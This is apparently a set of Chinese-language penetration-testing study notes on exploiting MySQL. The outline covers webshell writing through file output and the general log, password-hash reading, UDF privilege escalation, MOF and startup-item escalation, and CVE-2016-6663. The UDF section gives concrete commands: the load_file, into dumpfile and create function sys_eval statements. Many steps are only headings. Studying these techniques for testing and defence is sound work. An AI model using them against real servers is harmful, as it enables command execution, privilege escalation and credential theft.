mysql利用

Mysql 写入webshell复现

1.直接写入（windows成功率较高）

1. 查看是否允许可写（空可写，null不行，5.5以前默认为空，5.5以后默认为null）

2. 写入文件

 

 

2.日志文件写入shell（5.0以后会创建日志文件）（数据库权限）

1. 查看是否开启日志

2. 开启日志

3. 设置路径

4. 写入日志

 

3.直接读取mysql密码（5.6以下password，5.6以上authentication_string）

 

 

 

3. Udf提权（环境大于5.1，需要放在lib/plugin下）

1. 转码sqlmap的udf提权函数（sqlmap-master\data\udf\mysql\windows\64）

python cloak.py -d -i ../../data/udf/mysql/linux/64/lib_mysqludf_sys.dll_

2. 寻找mysql的plugin目录

 

 3. 将udf转化为16进制

select hex(load_file('/tmp/lib_mysqludf_sys_64.dll')) into outfile '/tmp/2.txt';

 

 

 4. 写入udf（长度限制，一般post）

Select （数据） into dumpfile “plugin路径”；

5. 创建自定义函数

create function sys_eval returns string soname 'lib_mysqludf_sys_64.dll';

 

 

 6. 执行命令

 

 7.drop function sys_eval（删除函数）；

4.mof提权（2003才可以成功）

原理：c://windows/system32/wbem/mof/每隔一定时间.mof文件会被执行。

5.启动项提权

6.CVE_2016-6663(拥有创建，插入，查询的账号)